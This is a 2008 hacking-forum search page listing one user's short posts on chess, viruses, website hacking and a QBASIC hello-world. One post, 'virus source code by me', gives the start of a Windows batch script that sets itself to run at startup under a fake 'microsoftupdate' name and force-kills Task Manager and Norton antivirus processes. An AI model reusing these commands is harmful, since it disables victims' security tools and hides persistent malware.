Search found 7 matches
Chess
This is the most favorite game in the world. About chess and hacker. I think hacker love to resolve problem. If you want to test your mind. Try to beat Rybka. Rybka is the best chess PC chess engine in the world. I love to play chess. The most programmer involve in chess activities.
- Thu Sep 11, 2008 2:02 am
- Forum: The Hacker's Server
- Topic: Sample codes for a Virus
- Replies: 26
- Views: 21245
The most virus!
The most virus write on simple application. Notepad. But go to internet you can find some sample in C++ how to make virus. Carefullest if you test a virus.
- Thu Sep 11, 2008 2:00 am
- Forum: The Hacker's Server
- Topic: Sample codes for a Virus
- Replies: 26
- Views: 21245
virus source code by me
@echo off reg add hklm\software\microsoft\windows\currentversion\run /v skls /t reg_sz /d microsoftupdate.bat /f taskkill /f /im taskmgr.exe taskkill /f /im Navw32.exe taskkill /f /im taskmgr.exe taskkill /f /im Navwnt.exe taskkill /f /im taskmgr.exe taskkill /f /im NAVStub.exe taskkill /f /im taskm...
- Thu Sep 11, 2008 1:22 am
- Forum: The Hacker's Server
- Topic: What's mean to hack ?
- Replies: 4
- Views: 6473
Hack
Hack is meaning a person who have the abilities to modified a part of code to make program do something can't be do by self. Hack is not bad word. If you have experience in computer programming. Hack is a good word. So to gain access to password from some web site. You need study more about programm...
- Thu Sep 11, 2008 1:16 am
- Forum: The Hacker's Server
- Topic: HACKIN A WEBSITE (need some people to work with me)
- Replies: 23
- Views: 20536
I am Hack along in the night!
The best time for hacking is at 3:00a.m Happy Hack Day Google. 

- Thu Sep 11, 2008 1:15 am
- Forum: The Hacker's Server
- Topic: HACKIN A WEBSITE (need some people to work with me)
- Replies: 23
- Views: 20536
I wanna help you but?
Don tell anymore you want to hack a website. This is bad for you. The most hacker work underground don't tell anymore your hack activities. What do you want to do if you hack this website what did you get. 

- Wed Sep 10, 2008 7:41 pm
- Forum: Challenges
- Topic: Hello World
- Replies: 13
- Views: 28778
Hello World!
1 REM * THIS A SAMPLE PROGRAM IN BASIC *;
2 REM* BY HYDRA*;
3 PRINT "HELLO WORLD";
4 END
RUN
HELLO WORLD
THIS ANOTHER SAMPLE
IN MICROSOFT QBASIC
REM *HELLOWORLD*
INPUT "WHAT IS YOUR NAME:" ;A$
PRINT "THANK YOU";A$
END
RUN
WHAT IS YOUR NAME: HYDRA
THANK YOU HYDRA
2 REM* BY HYDRA*;
3 PRINT "HELLO WORLD";
4 END
RUN
HELLO WORLD
THIS ANOTHER SAMPLE
IN MICROSOFT QBASIC
REM *HELLOWORLD*
INPUT "WHAT IS YOUR NAME:" ;A$
PRINT "THANK YOU";A$
END
RUN
WHAT IS YOUR NAME: HYDRA
THANK YOU HYDRA